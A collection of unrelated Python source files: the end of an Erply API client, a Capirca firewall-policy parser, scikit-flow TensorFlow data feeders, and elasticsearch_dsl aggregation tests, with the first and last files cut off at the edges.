_requests.append(_call(*_args, **_kwargs))
return self.erply.handle_bulk(self.json_dumper(_requests))
class ErplyResponse(object):
def __init__(self, erply, data, request, page=0, *args, **kwargs):
self.request = request
self.erply = erply
self.error = None
# Result pagination setup
self.page = page
self.per_page = kwargs.get('recordsOnPage', 20)
self.kwargs = kwargs
status = data.get('status', {})
self.total = status.get('recordsTotal')
self.records = { page: data.get('records')}
def fetchone(self):
if self.total == 1:
return self.records[0][0]
raise ValueError
def fetch_records(self, page):
self.erply.handle_get(self.request, _page=page, _response=self, **self.kwargs)
def populate_page(self, data, page):
assert self.per_page != 0
self.records[page] = data
def __getitem__(self, key):
if isinstance(key, slice):
raise NotImplementedError
if self.per_page * key >= self.total:
raise IndexError
if key not in self.records:
self.fetch_records(key)
return self.records[key]
class ErplyCSVResponse(object):
def __init__(self, erply, data):
self.erply = erply
status = data.get('status', {})
self.url = data.get('records').pop().get('reportLink')
self.timestamp = datetime.fromtimestamp(status.get('requestUnixTime'))
@property
def records(self):
with closing(requests.get(self.url, stream=True)) as f:
if f.status_code != requests.codes.ok:
raise ValueError
# XXX: Check whether we have to make it configurable...
# XXX: Should we remove header and footer?
return csv.reader(f.text.splitlines(), delimiter=';')
class ErplyBulkResponse(object):
def __init__(self, erply, response):
if response.status_code != requests.codes.ok:
print ('Request failed with error code {}'.format(response.status_code))
raise ValueError
self.data = response.json()
status = self.data.get('status', {})
if not status:
print ("Malformed response")
raise ValueError
self.error = status.get('errorCode')
self._requests = self.data.get('requests')
@property
def records(self):
if self._requests is None:
raise ValueError
for el in self._requests:
_status = el.get('status')
if _status.get('responseStatus') == 'error':
print ('Request failed: requestID: {} errorField: {}'.format(
_status.get('requestID'),
_status.get('errorField'),
))
else:
yield el.get('records')
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple, line-oriented parser for Caprica policies.
This parser differs from the default parser in that it preserves the original
structure and defers resolving referents to the user. This is useful for
analyzing policy structures and their use of naming data. It happens to discard
inline comments but preservers line-level comments. Fields expected to have
"naming" values are stored as a set without order or line breaks retained.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
class Field(object):
"""A name-value assignment within a block."""
def __init__(self, value):
self.value = value
def __str__(self):
t = type(self)
f = 'UNKNOWN'
for k, v in field_map.iteritems():
if t == v:
f = k
break
indent = len(f) + 5
return '%s::%s' % (f, self.ValueStr().replace('\n', '\n' + ' ' * indent))
def __eq__(self, o):
if type(self) != type(o):
return False
return self.value == o.value
def __ne__(self, o):
return not self == o
def Append(self, value):
self.value += value
def ValueStr(self):
return self.value
class IntegerField(Field):
def __init__(self, value):
super(IntegerField, self).__init__(value)
try:
_ = int(value)
except ValueError:
raise ValueError('Invalid integer field: "%s"' % str(self))
class NamingField(Field):
"""A naming field is one that refers to names in used in naming.py."""
def __init__(self, value):
super(NamingField, self).__init__(value)
self.value = self.ParseString(value)
def ParseString(self, value):
"""Split and validate a string value into individual names."""
parts = set(value.split())
for p in parts:
self.ValidatePart(p)
return parts
def ValidatePart(self, part):
"""Validate that a string smells like a naming.py name."""
for c in part:
if c not in '-_.' and not c.isdigit() and not c.isupper():
raise ValueError('Invalid name reference: "%s"', part)
def Append(self, value):
"""Split, validate, and add name contained within a string."""
parts = self.ParseString(value)
self.value.update(parts)
def ValueStr(self):
"""Return the value as a series of lines no longer than 60 chars each."""
values = sorted(self.value)
line_wrap = 60
length = 0
line_buf = []
value_buf = []
for v in values:
if length + len(v) > line_wrap:
value_buf.append(' '.join(line_buf))
length = 0
line_buf = []
else:
if line_buf:
length += 1
line_buf.append(v)
length += len(v)
if line_buf:
value_buf.append(' '.join(line_buf))
return ' ' + '\n'.join(value_buf)
class Action(Field):
"""An action field."""
class Address(NamingField):
"""An address field."""
class Port(NamingField):
"""A port field."""
class Comment(Field):
"""A comment field."""
def ValueStr(self):
# Comments should align with the string contents, after the leading
# quotation mark.
return self.value.replace('\n', '\n ')
class Counter(Field):
"""A counter field."""
class DestinationAddress(Address):
"""A destination-address field."""
class DestinationExclude(Address):
"""A destination-exclude field."""
class DestinationInterface(Field):
"""A destination-interface field."""
class DestinationPort(Port):
"""A destination-port field."""
class DestinationPrefix(Field):
"""A destination-prefix field."""
class DestinationPrefixExcept(Field):
"""A destination-prefix-except field."""
class DestinationTag(Field):
"""A destination tag field."""
class DscpMatch(Field):
"""A dscp-match field."""
class DscpSet(Field):
"""A dscp-set field."""
class EtherType(Field):
"""An ether-type field."""
class Expiration(Field):
"""An expiration field."""
class FragmentOffset(Field):
"""A fragment-offset field."""
class ForwardingClass(Field):
"""A forwarding-class field."""
class ForwardingClassExcept(Field):
"""A forwarding-class-except field."""
class IcmpCode(Field):
"""A icmp-code field."""
class IcmpType(Field):
"""A icmp-type field."""
class Logging(Field):
"""A logging field."""
class LossPriority(Field):
"""A loss-priority field."""
class Option(Field):
"""An Option field."""
class Owner(Field):
"""An owner field."""
class NextIP(Field):
"""An owner field."""
class PacketLength(Field):
"""A packet-length field."""
class Platform(Field):
"""A platform field."""
class PlatformExclude(Field):
"""A platform-exclude field."""
class Policer(Field):
"""A rate-limit-icmp field."""
class Precedence(Field):
"""A precedence field."""
class Principals(Field):
"""A principals field."""
class Protocol(Field):
"""A Protocol field."""
class ProtocolExcept(Field):
"""A protocol-except field."""
class Qos(Field):
"""A rate-limit-icmp field."""
class PANApplication(Field):
"""A rate-limit-icmp field."""
class RoutingInstance(Field):
"""A routing-instance field."""
class SourceAddress(Address):
"""A source-address field."""
class SourceExclude(Address):
"""A source-exclude field."""
class SourceInterface(Field):
"""A source-interface field."""
class SourcePort(Port):
"""A source-port field."""
class SourcePrefix(Field):
"""A source-prefix field."""
class SourcePrefixExcept(Field):
"""A source-prefix-except field."""
class SourceTag(Field):
"""A source tag field."""
class Target(Field):
"""A target field."""
class Timeout(IntegerField):
"""A timeout field."""
class TrafficType(Field):
"""A traffic-type field."""
class TrafficClassCount(Field):
"""A traffic-class-count field."""
class Verbatim(Field):
"""A verbatim field."""
class Vpn(Field):
"""A vpn field."""
destination_address_fields = (DestinationAddress, DestinationExclude,
DestinationPrefix)
field_map = {
'action': Action,
'address': Address,
'comment': Comment,
'counter': Counter,
'destination-address': DestinationAddress,
'destination-exclude': DestinationExclude,
'destination-interface': DestinationInterface,
'destination-port': DestinationPort,
'destination-prefix': DestinationPrefix,
'destination-prefix-except': DestinationPrefixExcept,
'destination-tag': DestinationTag,
'dscp-match': DscpMatch,
'dscp-set': DscpSet,
'ether-type': EtherType,
'expiration': Expiration,
'fragment-offset': FragmentOffset,
'forwarding-class': ForwardingClass,
'forwarding-class-except': ForwardingClassExcept,
'icmp-code': IcmpCode,
'icmp-type': IcmpType,
'logging': Logging,
'loss-priority': LossPriority,
'option': Option,
'owner': Owner,
'next-ip': NextIP,
'packet-length': PacketLength,
'platform': Platform,
'platform-exclude': PlatformExclude,
'policer': Policer,
'port': Port,
'precedence': Precedence,
'principals': Principals,
'protocol': Protocol,
'protocol-except': ProtocolExcept,
'qos': Qos,
'pan-application': PANApplication,
'routing-instance': RoutingInstance,
'source-address': SourceAddress,
'source-exclude': SourceExclude,
'source-interface': SourceInterface,
'source-port': SourcePort,
'source-prefix': SourcePrefix,
'source-prefix-except': SourcePrefixExcept,
'source-tag': SourceTag,
'target': Target,
'timeout': Timeout,
'traffic-class-count': TrafficClassCount,
'traffic-type': TrafficType,
'verbatim': Verbatim,
'vpn': Vpn,
}
class Block(object):
"""A section containing fields."""
def __init__(self):
self.fields = []
def __iter__(self):
return iter(self.fields)
def __getitem__(self, i):
return self.fields[i]
def __str__(self):
buf = []
buf.append(type(self).__name__.lower())
buf.append(' ')
if self.Name():
buf.append(self.Name())
buf.append(' ')
buf.append('{') # }
buf.append('\n')
for field in self.fields:
buf.append(' ')
buf.append(str(field))
buf.append('\n')
buf.append('}')
buf.append('\n')
return ''.join(buf)
def AddField(self, field):
if not issubclass(type(field), Field):
raise TypeError('%s not subclass of Field.', field)
self.fields.append(field)
def FieldsWithType(self, f_type):
if not issubclass(f_type, Field):
raise TypeError('%s not subclass of Field.', f_type)
return [x for x in self.fields if isinstance(x, f_type)]
def Match(self, match_fn):
"""Yield the fields and their indices for which match_fn is True."""
for i, f in enumerate(self.fields):
if match_fn(f):
yield i, f
def Name(self):
return ''
def __eq__(self, o):
if type(self) != type(o):
return False
if len(self.fields) != len(o.fields):
return False
for mine, theirs in zip(self.fields, o.fields):
logging.debug('testing "%s" vs "%s"', mine, theirs)
if mine != theirs:
return False
return True
def __ne__(self, o):
return not self == o
class Header(Block):
"""A header block."""
class Term(Block):
"""A policy term."""
def __init__(self, name):
super(Term, self).__init__()
self.name = name
def Name(self):
return self.name
def __eq__(self, o):
if not super(Term, self).__eq__(o):
return False
return self.name == o.name
def Describe(self):
"""Return a human-readable description of the term."""
verbatims = self.FieldsWithType(Verbatim)
if verbatims:
return 'Verbatim: %s' % verbatims
handled = set()
handled.update(self.FieldsWithType(Comment))
pieces = []
actions = self.FieldsWithType(Action)
if len(actions) != 1:
raise ValueError('No action or multiple actions.')
handled.update(actions)
pieces.append(actions[0].value.title() + ' traffic')
protocols = self.FieldsWithType(Protocol)
all_protocols = set()
if protocols:
handled.update(protocols)
for protocol in protocols:
all_protocols.update(protocol.value.split())
pieces.append('using ' + ' or '.join(sorted(all_protocols)))
icmp_code = self.FieldsWithType(IcmpCode)
all_icmp_code = set()
if icmp_code:
handled.update(icmp_code)
for code in icmp_code:
all_icmp_code.update(code.value.split())
pieces.append('(ICMP code %s)' % ', '.join(sorted(all_icmp_code)))
icmp_types = self.FieldsWithType(IcmpType)
all_icmp_types = set()
if icmp_types:
handled.update(icmp_types)
for icmp_type in icmp_types:
all_icmp_types.update(icmp_type.value.split())
pieces.append('(ICMP types %s)' % ', '.join(sorted(all_icmp_types)))
sources = self.FieldsWithType(SourceAddress)
if sources:
handled.update(sources)
pieces.append('originating from')
all_sources = set()
for source in sources:
all_sources.update(source.value)
pieces.append(', '.join(sorted(all_sources)))
source_ports = self.FieldsWithType(SourcePort)
if source_ports:
handled.update(source_ports)
if sources:
pieces.append('using port')
else:
pieces.append('originating port')
all_sources = set()
for source in source_ports:
all_sources.update(source.value)
pieces.append(', '.join(sorted(all_sources)))
destinations = self.FieldsWithType(DestinationAddress)
if destinations:
handled.update(destinations)
pieces.append('destined for')
all_destinations = set()
for destination in destinations:
all_destinations.update(destination.value)
pieces.append(', '.join(sorted(all_destinations)))
destination_ports = self.FieldsWithType(DestinationPort)
if destination_ports:
handled.update(destination_ports)
if destinations:
pieces.append('on port')
else:
pieces.append('destined for port')
all_destinations = set()
for destination in destination_ports:
all_destinations.update(destination.value)
pieces.append(', '.join(sorted(all_destinations)))
vpns = self.FieldsWithType(Vpn)
if vpns:
handled.update(vpns)
pieces.append('via VPNs')
pieces.append(','.join(x.value for x in vpns))
# Ignore some fields
for ignored_type in (Expiration, Owner):
ignored_fields = self.FieldsWithType(ignored_type)
if ignored_fields:
handled.update(ignored_fields)
for field in self:
if field not in handled:
raise ValueError('Uncovered field: ' + str(field))
return ' '.join(pieces)
class BlankLine(object):
"""A blank line."""
def __str__(self):
return '\n'
def __eq__(self, o):
return type(o) == BlankLine
def __ne__(self, o):
return not self == o
class CommentLine(object):
"""A comment in the file."""
def __init__(self, data):
self.data = data
def __str__(self):
return str(self.data) + '\n'
def __eq__(self, o):
if type(o) != CommentLine:
return False
return self.data == o.data
def __ne__(self, o):
return not self == o
class Include(object):
"""A reference to another policy definition."""
def __init__(self, identifier):
self.identifier = identifier
def __str__(self):
return '#include %s' % self.identifier
def __eq__(self, o):
if type(o) != Include:
return False
return self.identifier == o.identifier
def __ne__(self, o):
return not self == o
class Policy(object):
"""An ordered list of headers, terms, comments, blank lines and includes."""
def __init__(self, identifier):
self.identifier = identifier
self.members = []
def AddMember(self, member):
m_type = type(member)
if (m_type not in (Include, CommentLine, BlankLine)
and not issubclass(m_type, Block)):
raise TypeError('%s must be a Block, CommentLine, BlankLine,'
' or Include' % m_type)
self.members.append(member)
def __str__(self):
return ''.join(str(x) for x in self.members)
def __iter__(self):
return iter(self.members)
def __getitem__(self, i):
return self.members[i]
def Match(self, match_fn):
"""Yield the members and their indices for which match_fn is True."""
for i, m in enumerate(self.members):
if match_fn(m):
yield i, m
def MatchFields(self, block_match_fn, field_match_fn):
for match_idx, m in self.Match(block_match_fn):
if not isinstance(m, Block):
continue
for field_idx, f in m.Match(field_match_fn):
yield match_idx, field_idx, f
class PolicyParser(object):
"""Parse a policy object from a data buffer."""
def __init__(self, data, identifier):
self.data = data
self.identifier = identifier
self.block_in_progress = None
self.policy = None
def Parse(self):
"""Do the needful."""
self.policy = Policy(self.identifier)
for line in self.data.split('\n'):
line = line.strip()
logging.debug('Processing line: "%s"', line)
if self.block_in_progress:
self.ParseInBlock(line)
else:
self.ParseTopLevel(line)
if self.block_in_progress:
raise ValueError('Unexpected EOF reading "%s"', self.block_in_progress)
return self.policy
def ParseTopLevel(self, line):
"""Parse a line not nested within a block."""
if line == '': # pylint: disable=g-explicit-bool-comparison
self.policy.AddMember(BlankLine())
return
if line.startswith('#'):
if line.startswith('#include '):
self.ParseIncludeLine(line)
return
self.ParseCommentLine(line)
return
if line.startswith('header {') or line.startswith('header{'): # }
self.ParseHeaderLine(line)
return
if line.startswith('term '):
self.ParseTermLine(line)
return
raise ValueError('Unhandled top-level line %s', line)
def ParseCommentLine(self, line):
"""Parse a line with a line level comment."""
if self.block_in_progress:
raise ValueError('Found comment line in block: %s', line)
self.policy.AddMember(CommentLine(line))
def ParseIncludeLine(self, line):
"""Parse an #include line refering to another file."""
if self.block_in_progress:
raise ValueError('Found include line in block: %s', line)
line_parts = line.split()
if len(line_parts) < 2:
raise ValueError('Invalid include: %s', line)
inc_ref = line_parts[1]
if '#' in inc_ref:
inc_ref, _ = inc_ref.split('#', 1)
self.policy.AddMember(Include(inc_ref))
def ParseHeaderLine(self, line):
"""Parse a line beginning a header block."""
if self.block_in_progress:
raise ValueError('Nested blocks not allowed: %s', line)
self.block_in_progress = Header()
def ParseTermLine(self, line):
"""Parse a line beginning a term block."""
if self.block_in_progress:
raise ValueError('Nested blocks not allowed: %s', line)
line_parts = line.split()
# Some terms don't have a space after the name
if '{' in line_parts[1]: # }
brace_idx = line_parts[1].index('{') # }
line_parts[1] = line_parts[1][:brace_idx]
else:
if not line_parts[2].startswith('{'): # }
raise ValueError('Invalid term line: %s', line)
term_name = line_parts[1]
self.block_in_progress = Term(term_name)
def ParseInBlock(self, line):
"""Parse a line when inside a block definition."""
if line == '' or line.startswith('#'): # pylint: disable=g-explicit-bool-comparison
return
if '::' in line:
self.ParseField(line)
return
if line.startswith('}'):
self.policy.AddMember(self.block_in_progress)
self.block_in_progress = None
return
self.block_in_progress.fields[-1].Append('\n' + line)
def ParseField(self, line):
"""Parse a line containing a block field."""
name, value = line.split('::', 1)
name = name.strip().lower()
f_type = field_map.get(name)
if not f_type:
raise ValueError('Invalid field line: %s', line)
self.block_in_progress.AddField(f_type(value))
|
|
"""Implementations of different data feeders to provide data for TF trainer."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import math
import six
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.framework import dtypes
from .pandas_io import HAS_PANDAS, extract_pandas_data, extract_pandas_matrix, extract_pandas_labels
from .dask_io import HAS_DASK, extract_dask_data, extract_dask_labels
def _get_in_out_shape(x_shape, y_shape, n_classes, batch_size):
"""Returns shape for input and output of the data feeder."""
x_shape = list(x_shape[1:]) if len(x_shape) > 1 else [1]
input_shape = [batch_size] + x_shape
if y_shape is None:
return input_shape, None
y_shape = list(y_shape[1:]) if len(y_shape) > 1 else []
# Skip first dimension if it is 1.
if y_shape and y_shape[0] == 1:
y_shape = y_shape[1:]
if n_classes > 1:
output_shape = [batch_size] + y_shape + [n_classes]
else:
output_shape = [batch_size] + y_shape
return input_shape, output_shape
def _data_type_filter(X, y):
"""Filter data types into acceptable format"""
if HAS_DASK:
X = extract_dask_data(X)
if y is not None:
y = extract_dask_labels(y)
if HAS_PANDAS:
X = extract_pandas_data(X)
if y is not None:
y = extract_pandas_labels(y)
return X, y
def _is_iterable(X):
return hasattr(X, 'next') or hasattr(X, '__next__')
def setup_train_data_feeder(X, y, n_classes, batch_size):
"""Create data feeder, to sample inputs from dataset.
If X and y are iterators, use StreamingDataFeeder.
Args:
X: numpy, pandas or Dask matrix or iterable.
y: numpy, pandas or Dask array or iterable.
n_classes: number of classes.
batch_size: size to split data into parts.
Returns:
DataFeeder object that returns training data.
"""
X, y = _data_type_filter(X, y)
if HAS_DASK:
import dask.dataframe as dd
allowed_classes = (dd.Series, dd.DataFrame)
if (isinstance(X, allowed_classes) and
(y is None or isinstance(y, allowed_classes))):
data_feeder_cls = DaskDataFeeder
else:
data_feeder_cls = DataFeeder
else:
data_feeder_cls = DataFeeder
if _is_iterable(X):
if y is not None and not _is_iterable(y):
raise ValueError('Both X and y should be iterators for '
'streaming learning to work.')
data_feeder_cls = StreamingDataFeeder
return data_feeder_cls(X, y, n_classes, batch_size)
def _batch_data(X, batch_size):
chunk = []
for data in X:
chunk.append(data)
if batch_size > 0 and len(chunk) >= batch_size:
yield np.matrix(chunk)
chunk = []
yield np.matrix(chunk)
def setup_predict_data_feeder(X, batch_size=-1):
"""Returns an iterable for feeding into predict step.
Args:
X: numpy, pandas, Dask array or iterable.
batch_size: Size of batches to split data into.
If negative, returns one batch of full size.
Returns:
List or iterator of parts of data to predict on.
"""
if HAS_DASK:
X = extract_dask_data(X)
if HAS_PANDAS:
X = extract_pandas_data(X)
if _is_iterable(X):
return _batch_data(X, batch_size)
if len(X.shape) == 1:
X = np.reshape(X, (-1, 1))
if batch_size > 0:
n_batches = int(math.ceil(float(len(X)) / batch_size))
return [X[i * batch_size:(i + 1) * batch_size] for i in xrange(n_batches)]
return [X]
def setup_processor_data_feeder(X):
"""Sets up processor iterable.
Args:
X: numpy, pandas or iterable.
Returns:
Iterable of data to process.
"""
if HAS_PANDAS:
X = extract_pandas_matrix(X)
return X
def check_array(array, dtype):
"""Checks array on dtype and convers it if different.
Args:
array: Input array.
dtype: Expected dtype.
Returns:
Original array or converted.
"""
array = np.array(array, dtype=dtype, order=None, copy=False)
return array
class DataFeeder(object):
"""Data feeder is an example class to sample data for TF trainer.
Parameters:
X: feature Nd numpy matrix of shape [n_samples, n_features, ...].
y: target vector, either floats for regression or class id for
classification. If matrix, will consider as a sequence
of targets. Can be None for unsupervised setting.
n_classes: number of classes, 0 and 1 are considered regression.
batch_size: mini batch size to accumulate.
random_state: numpy RandomState object to reproduce sampling.
Attributes:
X: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, X, y, n_classes, batch_size, random_state=None):
x_dtype = np.int64 if X.dtype == np.int64 else np.float32
y_dtype = np.int64 if n_classes > 1 else np.float32
self.X = check_array(X, dtype=x_dtype)
self.y = (None if y is None else check_array(y, dtype=y_dtype))
self.n_classes = n_classes
self.batch_size = batch_size
self.input_shape, self.output_shape = _get_in_out_shape(self.X.shape, None
if self.y is None
else self.y.shape,
n_classes,
batch_size)
# Input dtype matches dtype of X.
self.input_dtype = self.X.dtype
# Output dtype always float32 (because for classification we use
# one-hot vectors.
self.output_dtype = np.float32
self.random_state = np.random.RandomState(
42) if random_state is None else random_state
self.indices = self.random_state.permutation(self.X.shape[0])
self.offset = 0
self.epoch = 0
self._epoch_placeholder = None
def make_epoch_variable(self):
"""Adds a placeholder variable for the epoch to the graph.
Returns:
The epoch placeholder.
"""
self._epoch_placeholder = array_ops.placeholder(dtypes.int32, [1],
name='epoch')
return self._epoch_placeholder
def input_builder(self):
"""Builds inputs in the graph.
Returns:
Two placeholders for inputs and outputs.
"""
input_shape = [None] + self.input_shape[1:]
self._input_placeholder = array_ops.placeholder(
dtypes.as_dtype(self.input_dtype),
input_shape,
name='input')
if self.output_shape is None:
self._output_placeholder = None
else:
output_shape = [None] + self.output_shape[1:]
self._output_placeholder = array_ops.placeholder(
dtypes.as_dtype(self.output_dtype),
output_shape,
name='output')
return self._input_placeholder, self._output_placeholder
def set_placeholders(self, input_placeholder, output_placeholder):
"""Sets placeholders for this data feeder.
Args:
input_placeholder: Placeholder for `X` variable. Should match shape
of the examples in the X dataset.
output_placeholder: Placeholder for `y` variable. Should match
shape of the examples in the y dataset. Can be None.
"""
self._input_placeholder = input_placeholder
self._output_placeholder = output_placeholder
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {
'epoch': self.epoch,
'offset': self.offset,
'batch_size': self.batch_size
}
def get_feed_dict_fn(self):
"""Returns a function, that will sample data and provide it to given
placeholders.
Args:
input_placeholder: tf.Placeholder for input features mini batch.
output_placeholder: tf.Placeholder for output targets.
Returns:
A function that when called samples a random subset of batch size
from X and y.
"""
assert self._input_placeholder != None
def _feed_dict_fn():
feed_dict = {}
if self._epoch_placeholder is not None:
feed_dict[self._epoch_placeholder.name] = self.epoch
# take random indices
batch_indices = self.indices[self.offset:self.offset + self.batch_size]
# assign input features from random indices
inp = np.array(self.X[batch_indices]).reshape((batch_indices.shape[0], 1)) \
if len(self.X.shape) == 1 else self.X[batch_indices]
feed_dict[self._input_placeholder.name] = inp
# move offset and reset it if necessary
self.offset += self.batch_size
if self.offset >= self.X.shape[0]:
self.indices = self.random_state.permutation(self.X.shape[0])
self.offset = 0
self.epoch += 1
# return early if there are no labels
if self._output_placeholder is None:
return feed_dict
# assign labels from random indices
self.output_shape[0] = batch_indices.shape[0]
out = np.zeros(self.output_shape, dtype=self.output_dtype)
for i in xrange(out.shape[0]):
sample = batch_indices[i]
if self.n_classes > 1:
if len(self.output_shape) == 2:
out.itemset((i, self.y[sample]), 1.0)
else:
for idx, value in enumerate(self.y[sample]):
out.itemset(tuple([i, idx, value]), 1.0)
else:
out[i] = self.y[sample]
feed_dict[self._output_placeholder.name] = out
return feed_dict
return _feed_dict_fn
class StreamingDataFeeder(DataFeeder):
"""Data feeder for TF trainer that reads data from iterator.
Streaming data feeder allows to read data as it comes it from disk or
somewhere else. It's custom to have this iterators rotate infinetly over
the dataset, to allow control of how much to learn on the trainer side.
Parameters:
X: iterator that returns for each element, returns features.
y: iterator that returns for each element, returns 1 or many classes /
regression values.
n_classes: indicator of how many classes the target has.
batch_size: Mini batch size to accumulate.
Attributes:
X: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, X, y, n_classes, batch_size):
X_first_el = six.next(X)
y_first_el = six.next(y)
self.X = itertools.chain([X_first_el], X)
self.y = itertools.chain([y_first_el], y)
self.n_classes = n_classes
self.batch_size = batch_size
self.input_shape, self.output_shape = _get_in_out_shape(
[1] + list(X_first_el.shape), [1] + list(y_first_el.shape), n_classes,
batch_size)
self.input_dtype = X_first_el.dtype
# Convert float64 to float32, as all the parameters in the model are
# floats32 and there is a lot of benefits in using it in NNs.
if self.input_dtype == np.float64:
self.input_dtype = np.float32
# Output types are floats, due to both softmaxes and regression req.
self.output_dtype = np.float32
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {'batch_size': self.batch_size}
def get_feed_dict_fn(self):
"""Returns a function, that will sample data and provide it to placeholders.
Args:
input_placeholder: tf.Placeholder for input features mini batch.
output_placeholder: tf.Placeholder for output targets.
Returns:
A function that when called samples a random subset of batch size
from X and y.
"""
def _feed_dict_fn():
inp = np.zeros(self.input_shape, dtype=self.input_dtype)
out = np.zeros(self.output_shape, dtype=self.output_dtype)
for i in xrange(self.batch_size):
inp[i, :] = six.next(self.X)
y = six.next(self.y)
if self.n_classes > 1:
if len(self.output_shape) == 2:
out.itemset((i, y), 1.0)
else:
for idx, value in enumerate(y):
out.itemset(tuple([i, idx, value]), 1.0)
else:
out[i] = y
return {self._input_placeholder.name: inp,
self._output_placeholder.name: out}
return _feed_dict_fn
class DaskDataFeeder(object):
"""Data feeder for TF trainer that reads data from dask.Series and dask.DataFrame.
Numpy arrays can be serialized to disk and it's possible to do random seeks
into them.
DaskDataFeeder will remove requirement to have full dataset in the memory
and still do
random seeks for sampling of batches.
Parameters:
X: iterator that returns for each element, returns features.
y: iterator that returns for each element, returns 1 or many classes /
regression values.
n_classes: indicator of how many classes the target has.
batch_size: Mini batch size to accumulate.
random_state: random state for RNG. Note that it will mutate so use a
int value for this if you want consistent sized batches.
Attributes:
X: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, X, y, n_classes, batch_size, random_state=None):
import dask.dataframe as dd
# TODO: check X and y dtypes in dask_io like pandas
self.X = X
self.y = y
# save column names
self.X_columns = list(X.columns)
if isinstance(y.columns[0], str):
self.y_columns = list(y.columns)
else:
# deal with cases where two DFs have overlapped default numeric colnames
self.y_columns = len(self.X_columns) + 1
self.y = self.y.rename(columns={y.columns[0]: self.y_columns})
# combine into a data frame
self.df = dd.multi.concat([self.X, self.y], axis=1)
self.n_classes = n_classes
X_count = X.count().compute()[0]
X_shape = (X_count, len(self.X.columns))
y_shape = (X_count, len(self.y.columns))
self.sample_fraction = batch_size / float(X_count)
self.input_shape, self.output_shape = _get_in_out_shape(X_shape, y_shape,
n_classes,
batch_size)
# self.X.dtypes[0], self.y.dtypes[self.y_columns]
self.input_dtype, self.output_dtype = np.float32, np.float32
if random_state is None:
self.random_state = 66
else:
self.random_state = random_state
self.batch_size = batch_size
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {'batch_size': self.batch_size}
def get_feed_dict_fn(self, input_placeholder, output_placeholder):
"""Returns a function, that will sample data and provide it to placeholders.
Args:
input_placeholder: tf.Placeholder for input features mini batch.
output_placeholder: tf.Placeholder for output targets.
Returns:
A function that when called samples a random subset of batch size
from X and y.
"""
def _feed_dict_fn():
# TODO: option for with/without replacement (dev version of dask)
sample = self.df.random_split(
[self.sample_fraction, 1 - self.sample_fraction],
random_state=self.random_state)
inp = extract_pandas_matrix(sample[0][self.X_columns].compute()).tolist()
out = extract_pandas_matrix(sample[0][self.y_columns].compute())
# convert to correct dtype
inp = np.array(inp, dtype=self.input_dtype)
# one-hot encode out for each class for cross entropy loss
if HAS_PANDAS:
import pandas as pd
if not isinstance(out, pd.Series):
out = out.flatten()
out_max = self.y.max().compute().values[0]
encoded_out = np.zeros((out.size, out_max + 1), dtype=self.output_dtype)
encoded_out[np.arange(out.size), out] = 1
return {input_placeholder.name: inp,
output_placeholder.name: encoded_out}
return _feed_dict_fn
|
|
from elasticsearch_dsl import aggs, query
from pytest import raises
def test_repr():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score})
assert "Terms(aggs={'max_score': Max(field='score')}, field='tags')" == repr(a)
def test_meta():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score}, meta={'some': 'metadata'})
assert {
'terms': {'field': 'tags'},
'aggs': {'max_score': {'max': {'field': 'score'}}},
'meta': {'some': 'metadata'}
} == a.to_dict()
def test_meta_from_dict():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score}, meta={'some': 'metadata'})
assert aggs.A(a.to_dict()) == a
def test_A_creates_proper_agg():
a = aggs.A('terms', field='tags')
assert isinstance(a, aggs.Terms)
assert a._params == {'field': 'tags'}
def test_A_handles_nested_aggs_properly():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score})
assert isinstance(a, aggs.Terms)
assert a._params == {'field': 'tags', 'aggs': {'max_score': max_score}}
def test_A_passes_aggs_through():
a = aggs.A('terms', field='tags')
assert aggs.A(a) is a
def test_A_from_dict():
d = {
'terms': {'field': 'tags'},
'aggs': {'per_author': {'terms': {'field': 'author.raw'}}},
}
a = aggs.A(d)
assert isinstance(a, aggs.Terms)
assert a._params == {'field': 'tags', 'aggs': {'per_author': aggs.A('terms', field='author.raw')}}
assert a['per_author'] == aggs.A('terms', field='author.raw')
assert a.aggs.per_author == aggs.A('terms', field='author.raw')
def test_A_fails_with_incorrect_dict():
correct_d = {
'terms': {'field': 'tags'},
'aggs': {'per_author': {'terms': {'field': 'author.raw'}}},
}
with raises(Exception):
aggs.A(correct_d, field='f')
d = correct_d.copy()
del d['terms']
with raises(Exception):
aggs.A(d)
d = correct_d.copy()
d['xx'] = {}
with raises(Exception):
aggs.A(d)
def test_A_fails_with_agg_and_params():
a = aggs.A('terms', field='tags')
